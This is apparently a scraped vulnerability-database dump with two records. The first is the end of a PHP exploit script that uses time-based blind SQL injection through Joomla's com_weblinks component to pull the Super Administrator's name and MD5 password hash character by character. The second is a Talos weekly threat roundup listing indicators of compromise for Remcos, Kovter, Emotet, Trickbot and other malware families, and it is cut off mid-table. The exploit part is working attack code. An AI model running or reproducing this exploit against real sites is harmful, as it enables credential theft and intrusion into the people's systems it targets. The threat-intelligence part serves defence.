=\"title=\".$sql;\r\n$data.=\"&catid=2\";\r\n$data.=\"&url=http://www.google.com\";\r\n$data.=\"&description=\";\r\n$data.=\"&id=0\";\r\n$data.=\"&option=com_weblinks\";\r\n$data.=\"&task=save\";\r\n$data.=\"&ordering=0\";\r\n$data.=\"&approved=0\";\r\n$data.=\"&Returnid=0\";\r\n$packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\n//debug\r\n//echo quick_dump($packet).\"\\r\\n\";\r\nsendpacketii($packet);\r\n$endtime=time();\r\necho \"endtime -> \".$endtime.\"\\r\\n\";\r\n$difftime=$endtime - $starttime;\r\necho \"difftime -> \".$difftime.\"\\r\\n\";\r\nif ($difftime > 7) {$admin.=chr($i);echo \"admin -> \".$admin.\"[???]\\r\\n\";sleep(2);break;} //more than seven seconds? we succeed...\r\nif ($i==255) {die(\"Exploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$md5s[0]=0;//null\r\n$md5s=array_merge($md5s,range(48,57)); //numbers\r\n$md5s=array_merge($md5s,range(97,102));//a-f letters\r\n//print_r(array_values($md5s));\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$md5s))\r\n{\r\n $starttime=time();\r\n $sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\n echo \"\\r\\n\".$sql.\"\\r\\n\";\r\n $sql=urlencode($sql);\r\n $data =\"title=\".$sql;\r\n $data.=\"&catid=2\";\r\n $data.=\"&url=http://www.google.com\";\r\n $data.=\"&description=\";\r\n $data.=\"&id=0\";\r\n $data.=\"&option=com_weblinks\";\r\n $data.=\"&task=save\";\r\n $data.=\"&ordering=0\";\r\n $data.=\"&approved=0\";\r\n $data.=\"&Returnid=0\";\r\n $packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n //debug\r\n //echo quick_dump($packet).\"\\r\\n\";\r\n sendpacketii($packet);\r\n $endtime=time();\r\n echo \"endtime -> \".$endtime.\"\\r\\n\";\r\n $difftime=$endtime - $starttime;\r\n echo \"difftime -> \".$difftime.\"\\r\\n\";\r\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(2);break;}\r\n}\r\n if ($i==255) {die(\"Exploit failed...\");}\r\n }\r\n $j++;\r\n}\r\n//if you are here...\r\necho \"Exploit succeeded...\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\necho \"admin -> \".$admin.\"\\r\\n\";\r\necho \"password (md5) -> \".$password.\"\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d0da9c5cf87ed68134d789b648fdc1b8", "key": "href"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "modified"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "000977933f613211c59d6cc18b78170a", "key": "sourceData"}, {"hash": "cce4daee587c29bc064bbf6d2a882370", "key": "sourceHref"}, {"hash": "7ad97a3bd9d56ae489f68c15e7e12542", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"talosblog": [{"lastseen": "2019-11-08T23:03:05", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 1 and Nov. 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/talos.tru_.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \n \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Remcos-7376444-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Kovter-7376187-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Dropper.Emotet-7375156-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Trickbot-7374019-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Malware.Phorpiex-7373816-1 | Malware | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, including malware that sends spam emails, ransomware and cryptocurrency miners. \nWin.Malware.Zbot-7373691-1 | Malware | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nWin.Malware.DarkComet-7371375-1 | Malware | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Packed.ZeroAccess-7370742-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Remcos-7376444-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 8 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: exepath ` | 6 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: licence ` | 6 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 8 \n`XLR4615DFT-CRBSFT` | 8 \n`Global\\0e3e6d21-fc20-11e9-a007-00501e3ae7b5` | 1 \n`Global\\96ab2081-00fe-11ea-a007-00501e3ae7b5` | 1 \n`Global\\d24f50c1-00fe-11ea-a007-00501e3ae7b5` | 1 \n`Global\\77238861-00fe-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`179[.]33[.]68[.]255` | 4 \n`179[.]33[.]152[.]127` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`proyectobasevirtualcol[.]com` | 8 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 8 \n`%APPDATA%\\System32` | 8 \n`%APPDATA%\\System32\\Snk.exe` | 8 \n`%APPDATA%\\Runtime3` | 6 \n`%APPDATA%\\Runtime3\\1627.dat` | 6 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 5 \n \n#### File Hashes\n\n` 01f18d1d2a28f1fa3df286d745ebe04521031af989db17818db42f6118417f60 1c74e101e6c49184a2766afafc33ab421900927ca39bfb8afc6e0c29c1d4bc4a 2993970ed0df750fb8ead03397e7d209d50c790ccea889f8cd3a57a3257d229a 2a0933719e5f6762061641d337324fe2b9778e13ac4785dfce00b10e3134a7de 3a725a79cc91e882a52237eda542e29d44734c64fce0edd924e1fee62e69bead 44a4d693d208abf527c5d286fdb45791d6bc97fbda6857f2d952a659a39f02fd 46eb980bd84f49f16aab9a9af815caedfffe92ddf0db272b330f6a9b625716cf 5752b25814c46d5084fa204ab381a18ebfb75fd0229ddac048fc673607ae52c1 622bb6dc7e751fc9352e7a23c9bc3ccd2e1855f6d5c37656516a54fe63ae6230 70ee3b93a10475214f534c162c6923ccdff92873709e2912ffd208ad12d447fb 7df44706454b41154f074f55a4bb5c42942a7e4a2dd244dd3d979dd28f81c602 99f7c0b78dac66e3fb5c571c466004e97ef6a75662ed2b1a7e49d17f85fa66f0 a6f8cd54dcd6a563c2195964cf1a65ce0d558ef753d0d9d25618cf5bb24332d9 b1b18b3fb4c4da002c4f8449042569a53be13971036b2b15bccb8a31392e8ce8 d78ec2e34df6a80321bac318055f095f49f244117f0307e3c59aa7326f834ca7 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-lUlJ35zN-xo/XcWVXsyC1cI/AAAAAAAAC5E/Ut3WMwK5dSA5gSyDbjjDmw78ps9feWz1ACLcBGAsYHQ/s1600/46eb980bd84f49f16aab9a9af815caedfffe92ddf0db272b330f6a9b625716cf_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7376187-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 25 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ssishoff ` | 25 \n`<HKCR>\\.16A05D ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vrxzdhbyv ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: tbqjcmuct ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: tbqjcmuct ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: xedvpa ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: xedvpa ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: svdjlvs ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: svdjlvs ` | 25 \n`<HKCR>\\7B507\\SHELL\\OPEN\\COMMAND ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: lujyoqmfl ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: lujyoqmfl ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: tnzok ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: tnzok ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: usukxpt ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: usukxpt ` | 25 \n`<HKCU>\\SOFTWARE\\<random, matching '[a-zA-Z0-9]{5,9}'> ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 7 \n`<HKCU>\\SOFTWARE\\YNRVKCYV3 \nValue Name: kwS6y5 ` | 1 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 25 \n`A83BAA13F950654C` | 25 \n`Global\\7A7146875A8CDE1E` | 25 \n`B3E8F6F86CDD9D8B` | 25 \n`408D8D94EC4F66FC` | 20 \n`Global\\350160F4882D1C98` | 20 \n`053C7D611BC8DF3A` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`48[.]35[.]9[.]231` | 2 \n`24[.]6[.]47[.]86` | 2 \n`53[.]51[.]100[.]34` | 2 \n`103[.]72[.]170[.]215` | 2 \n`100[.]65[.]74[.]134` | 2 \n`214[.]157[.]80[.]109` | 2 \n`53[.]189[.]39[.]167` | 2 \n`171[.]50[.]101[.]82` | 2 \n`186[.]88[.]125[.]16` | 2 \n`103[.]3[.]144[.]29` | 2 \n`191[.]63[.]106[.]220` | 2 \n`132[.]142[.]20[.]146` | 2 \n`185[.]144[.]48[.]120` | 2 \n`74[.]188[.]12[.]194` | 2 \n`151[.]185[.]129[.]250` | 2 \n`123[.]193[.]218[.]247` | 2 \n`7[.]184[.]47[.]209` | 2 \n`11[.]19[.]158[.]101` | 2 \n`89[.]73[.]101[.]218` | 2 \n`104[.]7[.]70[.]162` | 2 \n`111[.]104[.]240[.]101` | 2 \n`187[.]41[.]98[.]16` | 2 \n`39[.]158[.]228[.]212` | 2 \n`67[.]110[.]140[.]230` | 2 \n`87[.]88[.]172[.]42` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cp[.]aliyun[.]com` | 2 \n`netcn[.]console[.]aliyun[.]com` | 2 \n`help[.]dreamhost[.]com` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`panel[.]dreamhost[.]com` | 1 \n`fonts[.]gstatic[.]com` | 1 \n`www[.]cloudflare[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`www[.]dreamhost[.]com` | 1 \n`apps[.]digsigtrust[.]com` | 1 \n`apps[.]identrust[.]com` | 1 \n`cacerts[.]digicert[.]com` | 1 \n`www[.]wdos[.]net` | 1 \n`www[.]wddns[.]net` | 1 \n`www[.]wdcdn[.]com` | 1 \n`www[.]wdlinux[.]cn` | 1 \n`community[.]cambiumnetworks[.]com` | 1 \n`www[.]cambiumnetworks[.]com` | 1 \n`x[.]ss2[.]us` | 1 \n`www[.]wdcp[.]net` | 1 \n`docs[.]atlassian[.]com` | 1 \n`www[.]atlassian[.]com` | 1 \n`staging[.]theplaylist[.]net` | 1 \n`www[.]10dang[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\39b03\\6a5cc.16a05d` | 25 \n`%LOCALAPPDATA%\\39b03\\7cbdf.bat` | 25 \n`%HOMEPATH%\\Local Settings\\Application Data\\2501\\1ffa.41d68` | 20 \n`%HOMEPATH%\\Local Settings\\Application Data\\2501\\aae7.bat` | 20 \n \n#### File Hashes\n\n` 07f6d9e83f537600594c31b3602732e673876773d011ad3827d3b4bfd90263b3 09decefe05efe8d4de76c83d2d25b3688a7aa8a5b64a66d9beda52f1cb84d3e1 1034ec321ee9aacbac4c6eb13c9b7c337ee203f7690c75b03be96f45e7131854 1b027ad776520157003006129c70ffcb5a6df709784553abffc39e231cc35ba4 32ef3ff9e7f8879fac649e0bd47c943c5c9ae41f92ee11223bcdf3e735fcdd4d 4bfd91dbacfc04dd91dd43c00209141b6b33b3ce7d7fce5a40a39190e1020044 535870f540ccf5fa55b7d45b46e12c7f6cca475d7d1ed53a825bf4a74a8deaad 568ed4d9b0ecc820f370f364a9135cb99fe5cc61b953156c8abf2d8b4455ea35 5dc8da99651c7a508063c24d05724b8ce59ad6ae5a7b71d3acf27aa9a46937e0 6159c80c21256280b87b9be98bce4ce08a62712a5472ce88ab91ec58a889a998 670d2eef908fdaccbad25d40f7fc35deaa8a27667c8ae9c64c3c8c3f7b47715f 699f6b25a4d720eec442dab827192c5c3089da861c3c891f08c327918e0034c3 6e99630d9605ab0cdd26b273edc288e70b9b927fbd10bb4c531bdbaedb832842 716ca25938088e90d7529d396391ea45971e7716244684b7e431b46fae5d2f88 72301c500af238cd544b8208e3c5ea02d562143ab58a4fc7d429fb6dbdb5433a 77e117c5483524cd6bf8dcfa0b072d93644f71f15931b8f65be912dd2d4e0ac3 7803321e0e650f836a0260bd38dcac456e0bf822bd7d9159a03f509700f274a9 78bff6ee1f123cf5394c52b22f8bf282258684dc065d6fb3a6f7f11bb0dbb44c 7f9c7a64e9d7e46b31d842401064701c4cbaeee2d231b80e5221bc9b6dcad91c 886db07fb244827ecebfb8a0c807fc418d4e75699fe59d0a33203b2cacc30e08 94107471babcc12730005b1e70af6f59559229a0d2d325c18f88e8990c54a73b 9c3bc6fffc73ce25bd3f178daf44625b1ee681c7593ceef31e76fb5a2387ecb5 9d5304e56d130aeef6505442550c7cf49e3710f2ab7f31a7dd7db4a151fc5862 9f8721f77785853fded20778388a436d3ddc74a5200265a95ce7e168318b5f6c a1885a9e550677d9bdfbfa79590d9025c006940e540a795ab3700d3e960dc3e0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rjQIKflw3Ps/XcWVue7XNUI/AAAAAAAAC5M/MC1Pi9yDJ7YkS4zpK1HN1vJkDa4lZ6h2ACLcBGAsYHQ/s1600/6159c80c21256280b87b9be98bce4ce08a62712a5472ce88ab91ec58a889a998_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Emotet-7375156-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Type ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Start ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ErrorControl ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ImagePath ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: DisplayName ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: WOW64 ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ObjectName ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Description ` | 115 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 115 \n`Global\\M98B68E3C` | 115 \n`Global\\M3C28B0E4` | 42 \n`Global\\I3C28B0E4` | 42 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`173[.]194[.]68[.]108/31` | 74 \n`189[.]189[.]21[.]214` | 60 \n`17[.]36[.]205[.]74/31` | 59 \n`74[.]202[.]142[.]71` | 53 \n`185[.]94[.]252[.]27` | 50 \n`45[.]55[.]82[.]2` | 50 \n`37[.]187[.]5[.]82` | 50 \n`190[.]120[.]104[.]21` | 40 \n`172[.]217[.]10[.]83` | 38 \n`23[.]229[.]115[.]217` | 38 \n`74[.]202[.]142[.]33` | 37 \n`45[.]33[.]54[.]74` | 37 \n`54[.]38[.]94[.]197` | 33 \n`62[.]149[.]128[.]200/30` | 32 \n`74[.]202[.]142[.]98/31` | 29 \n`74[.]208[.]5[.]14/31` | 29 \n`172[.]217[.]3[.]115` | 28 \n`191[.]252[.]112[.]194/31` | 28 \n`74[.]208[.]5[.]2` | 27 \n`176[.]9[.]47[.]53` | 27 \n`196[.]43[.]2[.]142` | 27 \n`193[.]70[.]18[.]144` | 26 \n`220[.]194[.]24[.]10/31` | 25 \n`50[.]22[.]35[.]194` | 24 \n`173[.]201[.]192[.]229` | 22 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtpout[.]secureserver[.]net` | 69 \n`smtp[.]prodigy[.]net[.]mx` | 54 \n`smtp[.]alestraune[.]net[.]mx` | 37 \n`smtp[.]infinitummail[.]com` | 33 \n`secure[.]emailsrvr[.]com` | 32 \n`smtp[.]dsl[.]telkomsa[.]net` | 30 \n`imail[.]dahnaylogix[.]com` | 28 \n`smtp[.]orange[.]fr` | 28 \n`smtp[.]mail[.]com` | 27 \n`smtp[.]office365[.]com` | 26 \n`mail[.]cemcol[.]hn` | 25 \n`smtp[.]1and1[.]com` | 24 \n`smtp-mail[.]outlook[.]com` | 23 \n`smtp[.]mail[.]ru` | 22 \n`mail[.]aruba[.]it` | 21 \n`pop3s[.]aruba[.]it` | 21 \n`correo[.]puertotuxpan[.]com[.]mx` | 20 \n`smtp[.]zoho[.]com` | 19 \n`smtp[.]techcommwireless[.]com` | 19 \n`zmail2[.]tikona[.]co[.]in` | 19 \n`smtpout[.]asia[.]secureserver[.]net` | 18 \n`smtp[.]mail[.]me[.]com` | 18 \n`smtp[.]qiye[.]163[.]com` | 18 \n`mail[.]outlook[.]com` | 17 \n`smtp[.]aol[.]com` | 17 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\spooleripspsb.exe` | 2 \n`\\TEMP\\694.exe` | 2 \n`%SystemRoot%\\SysWOW64\\spooleripspsa.exe` | 1 \n`\\TEMP\\L6WtzMgB.exe` | 1 \n`\\TEMP\\wdEnqutV.exe` | 1 \n`\\TEMP\\pzcc3lk.exe` | 1 \n`\\TEMP\\p1cvp.exe` | 1 \n`\\TEMP\\ux68b0c6lxc0fow.exe` | 1 \n`\\TEMP\\z825f3w9uh.exe` | 1 \n`\\TEMP\\gcb5of4v1tlz.exe` | 1 \n`\\TEMP\\ezxnt4.exe` | 1 \n`\\TEMP\\39v3vti54d.exe` | 1 \n`\\TEMP\\tdr3z0u10.exe` | 1 \n`\\TEMP\\yqr4645h3g.exe` | 1 \n`\\TEMP\\70vol09busiw7g.exe` | 1 \n`\\TEMP\\2bn1wg8bam49.exe` | 1 \n`\\TEMP\\afoly3.exe` | 1 \n`\\TEMP\\yumjilsuex5ce.exe` | 1 \n`\\TEMP\\2gb7kk6.exe` | 1 \n`\\TEMP\\f80gj19dm6pg.exe` | 1 \n`\\TEMP\\itb9yhf.exe` | 1 \n`\\TEMP\\sd0ew7kemxl.exe` | 1 \n`\\TEMP\\9b65hy6s.exe` | 1 \n`\\TEMP\\5q1otsijpw2d6rr.exe` | 1 \n`\\TEMP\\002109r7ga.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02fc8369a88b82e3f3071515dacd5d66dac4a7bbc30c0273ce94f1d1c17016c2 0358ed9153522829b222680b6308ca2bfbb9af02f7577527d290bd6b5a45741a 05813a34ed66ce894edfe1283dcbb4aac108a27a9d100cd1beda364c3a9a14d8 05cb5ec98746d64d138330942f339979762f3d9e2103176927e5298aab38b44d 068c95ddf6682151bfac5a348f3cdc83dd28dbb3636945893c40919e5c2529f6 06bee1b52d91c40d92e37313f5a41dd75ccfe06f4081c8d82cc150de85afa8fc 07ee440c02863990aa804fe41894616f5a660a07cea93bf9f4e21b379637cd04 08a60b24edee93c10a2f7f88f771cada9d5fdb220e236ac7685bc5467187cc7d 09b5cd03af0aeff661f64799a67a1e4b68fe95ed8c19f33b9f79c6ba891e1961 0aef359713281304cb60b92f7f9a4f046e7ae0902809830a306e683830c0621e 0cc6fb091ca3119744ef99cc1a75bf093351962ede75fe01d9689ad6e611eed7 10f54c55d5df2aba0a5f86addb10e2b6022040f9e30541e865e823456526d181 1360747298f09ad4a3231036c557fddae2e65e0544fa2bcd42847fd13793eeeb 15683fc25f400427b06f471235d0080d9b340760e1cf0e53b402cc3f92724904 179dcfe6679c7d9e7527dbc7280807c7abe2ab8b6cd74671ca3a240bdb9f9b13 197b6142da885afd536a49e192dd6259abdb324bd3a278850c74b54d3ad819a4 1ad1ff05930f27ef4b349c7a612235d1632ef7ceaa1a17adf7c7b3a97b40ca4d 1d92855b93ac6e841ca7afe057ceef7c6a52eb1aa511c47c523d25c7f542785b 2089c98c6d15a5c669795eea5a310ec83cbf7614be2aae5bc1ed1721e406360d 2175ae9fcf2321d5855a81146a650a9fe69d622a3d0303076fbfe32ddc645bd1 2275693f9a5b245d54030abaaa757f799c369df22b26cce4a8df84d1497b682b 23f18138a5aa4ff7284e25faa8490b14706170a7980b73a2cb69527fa19a9655 25da27f6d266e9986c93a48d93be82632fdfc607416d42e183c27b404591a808 26213f98dda98e08963a7a2934a6eadb665121a23aa14493cc45f5c6b23e7099 2a80f80c219f9554c9779e86c47a51a27858a767bb7b1c45b1d52055f6b9a30a `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-_R0i9VaZ4iA/XcWWBOk-xpI/AAAAAAAAC5U/KuSmcoHMEeIdwllhvRMx-bq15Mc9KAq5ACLcBGAsYHQ/s1600/7f8eeaddf5e3e649e6710cb5246056903d0ba87cfb38071af1ff578e87bd4a89_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-P3LBFfzeJJs/XcWWFQS7ghI/AAAAAAAAC5Y/6uUrKObp4EE56kf91pzDRwq38IawApd6QCLcBGAsYHQ/s1600/55894b7c23326f3f24f0c8eb13077874cefac9d266d6392ac40bd93c144760f6_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7374019-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER \nValue Name: DisableAntiSpyware ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableBehaviorMonitoring ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableIOAVProtection ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS 